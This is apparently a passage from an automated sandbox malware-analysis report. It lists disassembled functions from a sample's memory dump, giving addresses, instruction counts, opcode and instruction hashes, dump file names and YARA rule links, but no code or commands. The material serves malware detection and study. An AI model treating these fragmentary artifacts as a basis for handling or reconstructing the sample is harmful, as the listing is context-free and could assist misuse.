                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9290cb90d03c69c29ed002481efff1ea27770515e2a84de6a4bf42986201b659
                                                                                                                      • Instruction ID: 5fa19173833cba56d4690bceb18a78bf3ddcd01b31397ebd4bdaf26abd37a64b
                                                                                                                      • Opcode Fuzzy Hash: 9290cb90d03c69c29ed002481efff1ea27770515e2a84de6a4bf42986201b659
                                                                                                                      • Instruction Fuzzy Hash: C9C16BB2A187818FC360CF29DC867ABB7E1BF85358F09492DD1D9C6342E778A155CB06
                                                                                                                      Function 00521C26 Relevance: .3, Instructions: 289COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8c20743748dd91a25e5b295503c0e6e67508512ae45f26c745e1bfe70a544dd0
                                                                                                                      • Instruction ID: 70b59315b38f8620a79058f4a9dca28df1f805ee35b7076ebdb5dd6e1a0b5dd1
                                                                                                                      • Opcode Fuzzy Hash: 8c20743748dd91a25e5b295503c0e6e67508512ae45f26c745e1bfe70a544dd0
                                                                                                                      • Instruction Fuzzy Hash: AFA1D47690C3019FD704DF24EC9675BBAE3EBD5308F09C93DE08997392EA3985099B46
                                                                                                                      Function 00507C10 Relevance: .3, Instructions: 277COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1255f4a16ea10230f8237e4c05ad8c588ba4ba9d264dd35e923e8e3087f5a603
                                                                                                                      • Instruction ID: d5ea100d392d8b5f3fda03859e2c5b596ad802909dbeaef6ab5233496fa5ec00
                                                                                                                      • Opcode Fuzzy Hash: 1255f4a16ea10230f8237e4c05ad8c588ba4ba9d264dd35e923e8e3087f5a603
                                                                                                                      • Instruction Fuzzy Hash: F98102759483458BD3109F6888817AFBBE1FF91318F088A6DE9D84B381E7789D49C787
                                                                                                                      Function 004FD1B0 Relevance: .3, Instructions: 274COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 93c9644fc9cbcaa7fa9ee6b1fc3a4ac5d212f520533d3d06e44b3e81d8f9b099
                                                                                                                      • Instruction ID: daf23d55b36ff9ddac560e7748846c7306a175d9b200ede18e17783fcd11d981
                                                                                                                      • Opcode Fuzzy Hash: 93c9644fc9cbcaa7fa9ee6b1fc3a4ac5d212f520533d3d06e44b3e81d8f9b099
                                                                                                                      • Instruction Fuzzy Hash: EB816F72A082654FC715CE18C85136FBBD2AB95364F18823DE9E58B3C2C738D946D7D2
                                                                                                                      Function 0051210B Relevance: .2, Instructions: 246COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 95abf2c56a45be8f96806c7e60459892c169e1cb8f0eb65bc63737cf2a9c3ab1
                                                                                                                      • Instruction ID: 4ba38672fa3a4c7afec5b607089e3028f6dd7d73c6c470857e0e55135c6ef732
                                                                                                                      • Opcode Fuzzy Hash: 95abf2c56a45be8f96806c7e60459892c169e1cb8f0eb65bc63737cf2a9c3ab1
                                                                                                                      • Instruction Fuzzy Hash: 65A11876608B808FD3158F3CC891396BFD2AF97314F1986ACC5EA8B393D6359846C752
                                                                                                                      Function 00524680 Relevance: .2, Instructions: 244COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: afa7b66fe8490001ffb3da9f34dc09486e41d8cbd0945ec0565ef59e932b8d50
                                                                                                                      • Instruction ID: 31e8cfda08eeb90e85ac4323abcf7d773f16fd5cb07d301277c53fd328d444b4
                                                                                                                      • Opcode Fuzzy Hash: afa7b66fe8490001ffb3da9f34dc09486e41d8cbd0945ec0565ef59e932b8d50
                                                                                                                      • Instruction Fuzzy Hash: 6C819F356042618BD724DF18E890A2BBBE1FF9A714F15862CE9948B3E1DB31EC55CF42
                                                                                                                      Function 00514FF0 Relevance: .2, Instructions: 240COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 69abc472b97c028d396617ca5e93f7dd7e4021b82ab735d33970e277469b5ba9
                                                                                                                      • Instruction ID: 5f3ea22e1b80b466dc3ae69a5ad1ef4bd851c4c79be0367527f6be5260211ad4
                                                                                                                      • Opcode Fuzzy Hash: 69abc472b97c028d396617ca5e93f7dd7e4021b82ab735d33970e277469b5ba9
                                                                                                                      • Instruction Fuzzy Hash: EB71012724DE9087E329953C4C653BAAE835FD7334F6D8B6DA4F24B3E1E47548469240
                                                                                                                      Function 00507885 Relevance: .2, Instructions: 211COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 5404589e8c7f652cb6561743dddd46792f52c22fc99bc0b2f14fce8107804d61
                                                                                                                      • Instruction ID: 5c045605306641e30af60980f58e8cfd7d591a7f23bd856cf4aa2f29b2ee48d8
                                                                                                                      • Opcode Fuzzy Hash: 5404589e8c7f652cb6561743dddd46792f52c22fc99bc0b2f14fce8107804d61
                                                                                                                      • Instruction Fuzzy Hash: 9661E672A5C3998BD7348E6884423AFBBE1FF99350F048D2DD4D9973C2D235A905D392
                                                                                                                      Function 004FF170 Relevance: .2, Instructions: 204COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 78451f04fa8b224bca7de9c53fb863c070420c9de0629d4ae46214f4b5a1897f
                                                                                                                      • Instruction ID: eba0ffb28fbd677e9ed238c057f14182027f965ebba8faa5e02132ce13d581ab
                                                                                                                      • Opcode Fuzzy Hash: 78451f04fa8b224bca7de9c53fb863c070420c9de0629d4ae46214f4b5a1897f
                                                                                                                      • Instruction Fuzzy Hash: 67617A3550C3958FC7258F39C89092E7BE0AF96314F0882BEE8D44B392D679DC09D756
                                                                                                                      Function 0050F4E1 Relevance: .2, Instructions: 198COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 37dba8f1ac59139cafc69da145fda1c41104bd673180c1207c6f44b82c0ed598
                                                                                                                      • Instruction ID: 964da213569121c7b899a978d8724126bbcf58cdc333923fd75987d50769e113
                                                                                                                      • Opcode Fuzzy Hash: 37dba8f1ac59139cafc69da145fda1c41104bd673180c1207c6f44b82c0ed598
                                                                                                                      • Instruction Fuzzy Hash: BC519D32A597424BD7248A38CC902AABF83EBD5321F1CC73DC49187BD6D7799809D380
                                                                                                                      Function 004FAB90 Relevance: .2, Instructions: 196COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8c5b9f0f3d3a0f1e94012f8dac502399bb2d27f381735cefbdc821ccefc00e0c
                                                                                                                      • Instruction ID: 4021fe0d1082c3d79c43ea4f97628b04cee77926e220f8010380770c9e9d6a34
                                                                                                                      • Opcode Fuzzy Hash: 8c5b9f0f3d3a0f1e94012f8dac502399bb2d27f381735cefbdc821ccefc00e0c
                                                                                                                      • Instruction Fuzzy Hash: CE5188B01083858FD310CF26C8A17ABBBE1EF86758F045A5DE5D58B791E3788909CB97
                                                                                                                      Function 0051C460 Relevance: .2, Instructions: 189COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8f1aa122ec59ae13e69cee9ce52d496232663b62829beb9f0467de8dcafb9024
                                                                                                                      • Instruction ID: 318549e270fe05c4a1d3b235a1aa124136c38f162b3f25ec7240757d6c25b4f0
                                                                                                                      • Opcode Fuzzy Hash: 8f1aa122ec59ae13e69cee9ce52d496232663b62829beb9f0467de8dcafb9024
                                                                                                                      • Instruction Fuzzy Hash: 0E516BB15087548FE314DF29D49435BBFE1BBC8358F044A2DE4E987351E379DA488B82
                                                                                                                      Function 00517850 Relevance: .2, Instructions: 188COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 972f9466bb9aff804bdd0995afb40aacd8245c517ff98869633c6078f4cd657f
                                                                                                                      • Instruction ID: 3eee44b16d28d1752512dc4c52722313f56ac715be1304b0cbcdaf7011e167ea
                                                                                                                      • Opcode Fuzzy Hash: 972f9466bb9aff804bdd0995afb40aacd8245c517ff98869633c6078f4cd657f
                                                                                                                      • Instruction Fuzzy Hash: 5951252274D9944BE328993C4C622AA7E934FDA230F2DC76EF5B6873E1D55488469250
                                                                                                                      Function 004FA770 Relevance: .2, Instructions: 170COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e281af5931a0a4a7be05551e5987da855a57549baa71ad7def7393086d679e50
                                                                                                                      • Instruction ID: 50663c85348139ae8fad1b3f7a71f8204be8ac85c5d303f18c7a4eb5907cc677
                                                                                                                      • Opcode Fuzzy Hash: e281af5931a0a4a7be05551e5987da855a57549baa71ad7def7393086d679e50
                                                                                                                      • Instruction Fuzzy Hash: CA51BC541083A44ACF44DF7688E5A3A7BF0EF4A305B0954DE9899CF367E678C605878A
                                                                                                                      Function 004E2210 Relevance: .2, Instructions: 166COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4ed71e2a486d8c2881663000f6a255a05a53a83236d136cb2b9154e2a059af10
                                                                                                                      • Instruction ID: 984478cb8ac2dd630082fa9d54b1fddc72bd263e07048b436291c6073890b7b7
                                                                                                                      • Opcode Fuzzy Hash: 4ed71e2a486d8c2881663000f6a255a05a53a83236d136cb2b9154e2a059af10
                                                                                                                      • Instruction Fuzzy Hash: 155182B18007459BD3209F299D4872BB7B8BF41325F14072DE8B9973E1E379DA15CB8A
                                                                                                                      Function 0051CE90 Relevance: .2, Instructions: 166COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8cb0ffe61d88d5e8565f94c3a02af6c4ce07a5a0e9d9e1d50c40bffb045aa222
                                                                                                                      • Instruction ID: b93dc3ac8cae168969ab2b022d58aca6eec47ed629661b9f7538d2dab822fe56
                                                                                                                      • Opcode Fuzzy Hash: 8cb0ffe61d88d5e8565f94c3a02af6c4ce07a5a0e9d9e1d50c40bffb045aa222
                                                                                                                      • Instruction Fuzzy Hash: C951067264D2118FE314CA28D4593AABFE2BBD5324F158B1EE4A6473D1E33589C6CB43
                                                                                                                      Function 004F7054 Relevance: .1, Instructions: 146COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1744da18f64dc79e14d8e36bbbf4bd972e73dc4913910eff474068959f5e674d
                                                                                                                      • Instruction ID: a98e3624e8f37947a0e061a1b29db1c6832a847683ab84d230887380155f7f9b
                                                                                                                      • Opcode Fuzzy Hash: 1744da18f64dc79e14d8e36bbbf4bd972e73dc4913910eff474068959f5e674d
                                                                                                                      • Instruction Fuzzy Hash: 89412A3565C7824BC336CE7994903BABBD2ABC6310F0C8A7D98D097785DE7CC80A8791
                                                                                                                      Function 0051CD40 Relevance: .1, Instructions: 143COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 549b4f452cc201c5641bd5c19871334d83eb667d6dce25a4303c69a392540114
                                                                                                                      • Instruction ID: c3920a5bad82b2fb401ade05b8b046531eba3c7278ff448df95a5ff0d3cd9722
                                                                                                                      • Opcode Fuzzy Hash: 549b4f452cc201c5641bd5c19871334d83eb667d6dce25a4303c69a392540114
                                                                                                                      • Instruction Fuzzy Hash: C6310732B856104BD318CA29CC423AABBD6A7C9324F0ED779E898D73D4E63DCC418791
                                                                                                                      Function 004E8D10 Relevance: .1, Instructions: 123COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1427327540.00000000004E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004E0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1427264284.00000000004E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427369016.0000000000526000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427388797.0000000000529000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427407684.000000000052E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.1427430339.0000000000537000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_4e0000_UNK_.jbxd
                                                                                                                      Similarity
